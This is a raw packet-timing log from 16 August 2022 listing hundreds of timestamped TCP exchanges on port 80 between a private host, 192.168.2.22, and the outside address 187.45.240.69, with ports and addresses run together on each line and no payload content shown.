                                        Aug 16, 2022 10:49:04.569853067 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569859982 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569869041 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569876909 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569886923 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569897890 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569909096 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569921017 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569930077 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569941998 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.569957018 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.569973946 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601331949 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601368904 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601385117 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601402998 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601421118 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601421118 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601439953 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601457119 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601470947 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601480007 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601485014 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601524115 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601542950 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601561069 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601577044 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601598024 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601599932 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601620913 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601624012 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601634979 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601661921 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601761103 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601802111 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601811886 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601830006 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601872921 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601885080 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601905107 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601926088 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601928949 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601934910 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601948023 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601969957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601969957 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.601978064 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.601991892 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602013111 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602016926 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602026939 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602035046 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602050066 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602056980 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602073908 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602080107 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602097034 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602102995 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602122068 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602128029 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602144003 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602149963 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602174044 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602197886 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602197886 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602207899 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602211952 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602219105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602236986 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602241993 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.602282047 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.602547884 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.613640070 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798130035 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798163891 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798182964 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798199892 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798212051 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798222065 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798228025 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798244953 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798245907 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798249960 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798261881 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798264980 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798280954 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.798280954 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798300028 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.798314095 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.812505960 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.823422909 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.823457003 CEST8049204187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.823513031 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.823538065 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841298103 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841342926 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841376066 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841373920 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841408968 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841415882 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841418028 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841450930 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841459036 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841485977 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841496944 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841521025 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841523886 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841553926 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841563940 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841588974 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841593981 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841624022 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841629028 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841655970 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841666937 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841691017 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841696024 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841725111 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841737032 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841762066 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841774940 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841797113 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841809034 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841830969 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841844082 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841866016 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841876984 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841901064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.841913939 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.841947079 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842078924 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842147112 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842200041 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842314005 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842343092 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842351913 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842358112 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842386961 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842398882 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842422962 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842436075 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842475891 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842523098 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842573881 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842619896 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842622042 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842654943 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842670918 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842689991 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842699051 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842725039 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842745066 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842760086 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842806101 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842856884 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842869997 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842896938 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.842943907 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.842989922 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843076944 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843127966 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843169928 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843213081 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843230009 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843318939 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843367100 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843394995 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843434095 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843444109 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843467951 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:04.843481064 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.843508005 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.852129936 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:04.909359932 CEST4920480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.025861979 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025897026 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025917053 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025933981 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025952101 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025968075 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.025970936 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.025988102 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026000023 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026004076 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026005983 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026020050 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026024103 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026042938 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026045084 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026061058 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026066065 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026079893 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026086092 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026098013 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026103020 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026115894 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026123047 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026133060 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026139021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026150942 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026158094 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026169062 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026173115 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026186943 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026190996 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026205063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026206970 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026222944 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026226044 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026241064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026242018 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026258945 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026259899 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026274920 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026282072 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026294947 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026294947 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026314020 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026319027 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026333094 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026340008 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026351929 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026354074 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026360035 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026370049 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026388884 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026390076 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026407957 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026408911 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026424885 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026427984 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026443005 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026446104 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026462078 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026463985 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026479006 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026484013 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026503086 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026525021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026731014 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026748896 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026767015 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026773930 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026783943 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026802063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026820898 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026824951 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026830912 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026838064 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026844025 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026856899 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026856899 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026876926 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026891947 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026901960 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026918888 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026936054 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026953936 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026957989 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026971102 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.026978016 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026983976 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.026990891 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027008057 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027014971 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027033091 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027064085 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027070999 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027108908 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027126074 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027132034 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027144909 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027147055 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027163029 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027167082 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027180910 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027184963 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027198076 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027205944 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027219057 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027231932 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027254105 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027292967 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027311087 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027316093 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027328014 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027333021 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027345896 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027369022 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027374029 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027379990 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.027405024 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027431965 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027633905 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.027854919 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.069665909 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069725990 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069765091 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.069767952 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069799900 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.069808960 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069849014 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069855928 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.069890976 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069900036 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.069930077 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.069972992 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070002079 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070012093 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070018053 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070050955 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070065022 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070091009 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070116043 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070122957 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070131063 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070143938 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070171118 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070211887 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070219040 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070250988 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070291042 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070302963 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070314884 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070337057 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070353985 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070378065 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070388079 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070419073 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070424080 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070460081 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070498943 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070516109 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070539951 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070544958 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070579052 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070590019 CEST4920380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:49:05.070620060 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070662022 CEST8049203187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:49:05.070672035 CEST4920380192.168.2.22187.45.240.69
